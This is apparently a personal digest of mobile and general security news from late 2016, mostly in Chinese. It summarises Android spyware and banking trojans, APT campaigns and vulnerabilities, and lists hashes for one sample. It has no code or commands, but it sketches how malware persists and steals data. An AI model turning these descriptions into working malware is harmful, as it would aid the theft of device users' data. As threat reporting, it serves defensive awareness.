11.2 Belkin’s WeMo Gear Can Hack Android Phones
Belkin 办公自动化系统 WeMo 存在漏洞,攻击者可以控制家庭自动化设备
-
11.3 iOS 越狱相关的精华资料收集
-
11.3 Android spyware targets business executives
Android的间谍软件针对企业高管。恶意软件包名为“com.android.protect”,伪装成Google Play Services app.
它能使Samsung’s SPCM服务失效,以此来保持运行,如果能获取root权限,它会将自己安装为系统包来防止被用户移除,后可以隐藏图标。
一旦安装运行,恶意软件会要求设备管理权限,询问进入的证书号,隐藏自己(拨打“11223344”可发现其存在),最后要求root权限(如果设备已被root)。
-
11.3 Exaspy :针对高级管理人员的Android间谍软件
恶意软件包名为“com.android.protect”,伪装成Google Play Services app.它能使Samsung’s SPCM服务失效,以此来保持运行,如果能获取root权限,它会将自己安装为系统包来防止被用户移除,后可以隐藏图标。一旦安装运行,恶意软件会要求设备管理权限,询问进入的证书号,隐藏自己(拨打“11223344”可发现其存在),最后要求root权限(如果设备已被root)。
Known hashes:
- c4826138e07636af1eeb6008e580704575ec1bc7
- 4bf89c3bf4fb88ad6456fe5642868272e4e2f364
- 9725c1bf9483ff41f226f22bd331387c187e9179
- c4826138e07636af1eeb6008e580704575ec1bc7
- f1fbebc2beafe0467ee00e69b3f75719cdbbd693
Package names: com.android.protect
Public key information:
Subject: /O=Exaspy/OU=Exaspy/CN=Exaspy
Fingerprint: c5c82ecf20af94e0f2a19078b790d8434ccedb59
-
11.4 Over 1 Billion Mobile App Accounts can be Hijacked Remotely with this Simple Hack
-
11.6 小心手机被物联网设备入侵!
-
11.7 Gmail 帐户劫持漏洞
-
11.7 人大刚刚通过的《网络安全法》都有哪些看点
-
SVPENG ANDROID银行木马
11.7 Trojan-Banker.AndroidOS.Svpeng木马攻击分析 11.8 SVPENG ANDROID银行木马通过Chrome Bug来扩散
-
11.8 席卷全球的“霸屏”病毒:技术分析与处理
-
11.8 iOS WebView 自动拨号漏洞
-
11.9 针对白俄罗斯军事通讯社的APT样本分析
-
11.9 针对ATM机的渗透测试
-
11.10 Trick蠕虫病毒来袭,幕后主使竟是一名高中生
该病毒伪装成中国移动,以免费获取话费的短信诱惑用户下载安装。运行后窃取用户短信,锁定手机进行勒索,并向所有联系人群发附带恶意下载链接的钓鱼短信。一旦用户卸载此恶意软件,该病毒会直接锁定用户手机并进行勒索
-
11.10 Nathan:Android安全测试模拟器 - 11.10 通过WiFi信号来推断您的手机密码
-
11.10 Doctor Web registers more than one million downloads of Android Trojan from Google Play
-
11.11 飞龙之眼:维吾尔主题相关网络攻击活动调查
-
11.11 俄罗斯五家大型银行遭受30个国家的DDoS攻击
-
11.11 Dangerous Virus Is Spying on Almost All Popular Social APPs
监视热门社交APP的危险病毒Onespy,Onespy运行后会申请设备管理权限,监控用户位置,窃取用户短信息,同时窃取用户社交软件中的聊天记录。 热门社交软件包括Facebook, Twitter, Whatsapp, Skype, Line, Gmail, BBM, Viber等
-
11.12 黑客告诉你:搞定整座城市的公共WiFi是多么容易
-
11.13 当人工智能应用于黑色产业
-
11.14 2016年3例严重工控安全事故经验教训总结
2016年8月,Operation GHOUL(食尸鬼)行动,攻击中东和其它国家的工控组织;
2015年12月23日,BLACKENERGY(黑暗力量)攻击导致的断电事故,攻击乌克兰电力供应商
2016年3月24日,伊朗黑客攻击美国大坝事件,攻击纽约鲍曼水坝的一个小型防洪控制系统
-
11.14 HackingTeam back for your Androids, now extra insecure!
-
11.14 Kaspersky Lab Black Friday Threat Overview 2016
报告 KASPERSKY-LAB-BLACK-FRIDAY-THREAT-OVERVIEW-2016.pdf
-
11.15 值得收藏!国外最佳互联网安全博客TOP 30
-
11.15 中国再次发现来自海外的黑客攻击:蔓灵花攻击行动
一个针对中国政府机构和能源行业发起APT攻击的海外黑客组织,该黑客组织与此前披露的摩诃草APT组织类似,同样以中国和巴基斯坦作为攻击目标,意在窃取情报
-
11.15 瑞星:手机病毒新变种 化身“中国移动”盗隐私
该病毒伪装成“中国移动”官方APP软件,诱导用户下载安装,一旦用户安装,会自动发送一条受害用户的基本信息到病毒作者手机上,同时还会上传受害者手机通讯录、短信等内容到病毒作者的邮箱,给用户造成严重的隐私泄露
-
11.15 Banking Trojan Targets German Financial Institutions
恶意软件通过钓鱼邮件或者短信中的链接传播,或者是钓鱼页面。仿冒邮件应用,使用相似的图标,启动后设法获取设备管理权限,隐藏图标,在后台偷偷运行。
-
11.15 魔波广告恶意病毒简析
该病毒通过仿冒浏览器,播放器和一些游戏等进行传播,一旦用户手机不慎被感染,该病毒将立即下载提权文件来获取root权限,频繁推送广告,监控用户短信记录,私自发送扣费短信,注入大量恶意文件到手机系统用于守护病毒,防止病毒被卸载。
-
11.21 调查发现三款移动应用曝光了30亿电话号码
美国Cheetah Mobile 开发的CM Security、瑞典True Software Scandinavia AB开发的Truecaller和以色列公司Sync.ME.LTD开发的Sync.ME。
Truecaller的数据库包含了超过30亿电话号码,该公司已经与华为达成了协议,其应用预装在华为荣耀8智能手机上
-
11.18 针对德国银行的Android病毒
11.18 Android Banking Malware Masquerading as Email App Targets German Banks
-
11.18 安卓银行恶意软件可自行列入白名单以与网络攻击者保持通讯
网络攻击者对Android.Fakebank.B变体进行了升级,使其能够绕过Doze电池节能程序。
这些恶意软件变体会展示一条弹出信息,要求用户将其加入电池优化额外情况白名单之中。
如果此方法生效,则即使设备处于休眠状态,恶意软件也能够与命令和控制服务器保持通讯。
-
11.19 华为碾压高通 拿下5G时代
-
11.21 Android malware analysis with Radare: Dissecting the Triada Trojan
-
11.21 闲聊阿里加固(一)
-
11.22 针对台湾政府能源公司的Tropic Trooper APT组织,来自paloaltonetworks的技术分析
-
11.22 Mac上恶意软件的总览
-
11.22 关于“魅魔”漏洞情况的通报
蚂蚁金服巴斯光年安全实验室关于广升FOTA系统升级服务存在命令执行漏洞(CNNVD-201611-438)的情况报送
-
11.23 Never judge a book by its cover
一个学习C++的应用(Learn C++),一个银行应用(ITS Mobile Banking),看似无害,实则藏有危险模块。
-
11.23 2016诈骗电话态势与特征分析报告
-
11.23 MobSF:自动化移动安全测试框架
-
11.23 MacOS安全:通过email稳定控制Mac总结
-
11.23 全球HTTPS时代已来,你跟上了吗?
-
11.24 那些年,我们一起玩过的后门
-
11.25 互联网业务安全背后的黑灰产业链故事
-
11.25 Zigbee 安全与 IoT 设备漏洞利用
-
11.25 我是如何绕过apple激活锁的
-
11.26 转发http/s流量到代理的开源项目
-
11.27 Linux提权的4种方式
-
11.29 迈克菲发布2017年14个信息安全发展趋势
-
11.29 iPhone 播放视频自动关机“奇葩”漏洞成因分析
播放含有畸形数据的样本视频,会造成 iOS 内核中负责视频解码的模块进入死循环,进而引起内核 WatchDog 超时,造成内核重启
-
11.29 神级脚本大集合之PowerShell-Suite
-
11.29 如何使用WLAN的SSID提取用户的凭证数据
-
11.29 以色列凭什么成为全球监控技术的中心?
-
11.29 mirai僵尸网络新变种
11.29 德国电信断网:mirai僵尸网络的新变种和旧主控
11.29 又一起断网事件!路由器高危漏洞致德国百万用户断网
-
11.30 Three roads lead to Rome
Vulcan的Edge exp已发布,应该是首个公开的针对Edge的完整漏洞和利用技术详解
-
11.30 安全联盟10-11月网购诈骗数据报告
-
11.30 PluginPhantom: New Android Trojan Abuses “DroidPlugin” Framework
新安卓木马PluginPhantom,窃取用户信息,包括:文件,位置信息,通讯录和Wi-Fi信息等。也可以拍照,截屏,录音,拦截和发送短信等,此外还可以记录键盘输入信息。
它通过滥用流行的开源框架“DroidPlugin”来逃避静态检测。
-
11.30 网联上线,支付宝、微信有望可以相互转账了
-
0x11
-
12.1 注意了,cURL的漏洞也不少
-
12.1 分析Airdroid中的多个漏洞
-
12.1 赛门铁克发布2017年安全威胁趋势预测
-
12.2 A flaw allows to bypass the activation lock on iPhone and iPad
-
12.3 2017年安全行业八大预测
-
12.4 一群极其注重隐私的人士,开发了一款超级安全的Android系统
基于Tor网络的Android手机使用了CopperheadOS、Orbot和orWall,而开发人员设计这个原型的目的就是为了帮助用户保护自己的隐私信息,并且防止用户感染移动端的恶意软件。
-
12.8 Mobile Ransomware: Pocket-Sized Badness
讲各种安卓勒索件的技术报告
-
12.8 Threat-Intelligence-Analyst
主要包括威胁情报,恶意样本分析,自动化python脚本,开源Malware代码收集,APT攻击安例相关
-
12.9 12月安全补丁风险评估
-
12.9 利用电商逻辑漏洞爆破信用卡CVV及有效期
-
12.10 京东数据疑似外泄:超过12个G,涉及数千万用户
-
12.12 支付宝新骗局:收到4万转账到手上7万却被骗光!
-
12.12 伪装成Adobe Flash更新软件的银行木马
通过电子邮件钓鱼,伪装成Adobe Flash的更新,假冒Adobe官网,诱导用户点击链接,下载安装银行木马程序。
-
12.12 Mirai变种中的DGA
-
12.13 利用同步回调机制攻击Android的系统服务和系统应用
SecComm系统服务是Android系统中的重要组件:它们将内核层的底层功能进行封装,并对上层的应用进程提供服务
-
12.13 国家电网App海量用户数据被倒卖至黑产
-
低端Android设备固件发现恶意程序(Android.DownLoader.473.origin)
12.13 More Firmware Backdoor Found In Cheap Android Phones 12.12 Doctor Web discovers Trojans in firmware of well-known Android mobile devices 12.9 Doctor Web discovers new version of Android.Loki Trojans that infects system libraries Dr.Web的研究人员从26款使用联发科平台的低端Android设备固件中发现木马Android.DownLoader.473.origin,
该木马会在用户设备上展示广告,安装用户不需要的应用,打开浏览器特定链接,拨打特定电话,等等。
-
12.13 刷机教程:教你如何打造一台渗透测试手机
-
12.13 最新盗窃手法:ETC里的钱竟被POS机隔空刷光
-
12.13 Comodo Threat Research Labs Warns Android Users of “Tordow v2.0” outbreak
Tordow 2.0可以拨打电话,控制短信,下载安装程序,窃取登陆凭证,获取通讯录,加密文件,篡改银行数据,移除安全软件,重启动设备,像勒索件一样地工作。
它能搜集安卓或谷歌浏览器中保存的敏感信息,搜集设备各种数据,包括硬件、软件信息,操作系统,制造商,网络运营商,用户位置等。
-
12.14 中国市场手机系统安全检测报告
-
12.14 2016安卓手机漏洞年终盘点
-
12.14 2016卡巴斯基安全公告年度故事——勒索革命
-
12.14 双0DAY攻击:针对欧洲个人目标的APT攻击
-
12.15 “史上最难抢票季”已开幕 抢票软件成勒索“利器”
-
12.16 2016敲诈者病毒威胁形势分析报告发布(PC端)
-
12.16 2016年全球十大网络安全事件盘点
-
12.19 安全牛:2016年网络安全大事记
-
12.19 The banker that encrypted files(Faketoken)
银行木马,启动后会请求设备管理员权限,获取权限后可获取短信、文件及通讯录信息,可发送短信和拨打电话。 会在其他应用之上显示钓鱼界面,以此来窃取用户信息。该木马同时还能加密用户SD卡中的文件。
-
12.19 Fake Apps Take Advantage of Super Mario Run Release
两个虚假的Super Mario应用程序,程序名均为“Super Mario”,一个检出为ANDROIDOS_DOWNLOADER.CBTJ,一个检出为ANDROIDOS_DOWGIN.AXMD
-
12.20 评选出的2016年的TOP 10黑客工具
-
12.21 你必须了解的漏洞利用缓解及对抗技术
-
12.21 Android Doze机制与木马的绕过方式
-
12.21 红包外挂那点事
-
12.21 2016年手机移动面对的10大风险
-
12.22 iOS安全审计入门
-
12.22 五大安全研究者必用的搜索引擎
-
12.22 Fancy Bear Hackers Breached Ukrainian Artillery Using Android Malware
Fancy Bear组织使用一个使用感染的X-Agent,跨平台的远程访问工具包,来攻击乌克兰炮火系统的一个Android应用程序。
被用于攻击的包名为“Попр-Д30.apk” ,可以用来从受感染的设备中检索通信和位置数据。
-
12.22 Fancy Bear Hackers Breached Ukrainian Artillery Using Android Malware
俄国黑客组织奇幻熊(Fancy Bear),利用感染有X-Agent控件的某个重要安卓应用,入侵乌克兰炮兵部队的武器系统。
奇幻熊黑客将恶意软件植入应用安装包,以“Попр-Д30.apk”文件名成功打入社区内部,约有9000台安卓设备感染了含有恶意软件的安卓应用。
恶意软件将大量乌克兰火炮单位的位置信息等机密军事情报输送给俄军方。
-
12.23 盘点2016年“最创新”的8种攻击方式
-
12.23 技术流花式“破解”支付宝AR红包
-
12.26 瑞星反诈骗安全报告
-
12.26 Mirai 总结—从源码到反汇编
-
12.26 布谷鸟沙箱初体验
-
12.27 2016年iOS公开可利用漏洞总结
-
12.27 盘点2016年的那些骗局和漏洞
-
12.27 绿盟网络安全威胁12月月报
-
12.27 国家网信办发布《国家网络空间安全战略》
-
12.27 七种方法绕过安卓手机锁屏
-
12.28 《物联网安全白皮书》
-
12.28 2016年网络安全行业全景图(下半年)
-
12.28 Android木马Switcher 通过 DNS 劫持来感染路由器
木马Trojan.AndroidOS.Switcher不直接攻击用户,而是攻击无线路由器,在路由器的管理Web界面上执行暴力密码猜测攻击。
如果攻击成功,恶意软件会更改路由器设置中DNS服务器的地址,从而进行DNS劫持
-
12.28 微信被恶意apk盗了绑定银行卡的钱被刷光
-
12.28物联网安全白皮书
http://www.secjia.com/report/NSFOCUS-IoT-Security-Whitepaper.pdf
-
12.29 剑与盾——移动游戏安全攻防研究
-
12.29 Bug: crash Message application by MMS on iOS
恶意的MMS使ios的Messages应用程序崩溃,和之前的阿拉伯语的文本字符串导致崩溃类似
-
12.29 Android恶意软件分析
-
12.30 Doctor Web’s annual virus activity review for mobile devices
-
Android中热修复框架Robust原理解析并将框架代码从"闭源"变成"开源"
-
12.31 2016年数据泄露年度汇总
-
##关于 author: drov_liu
-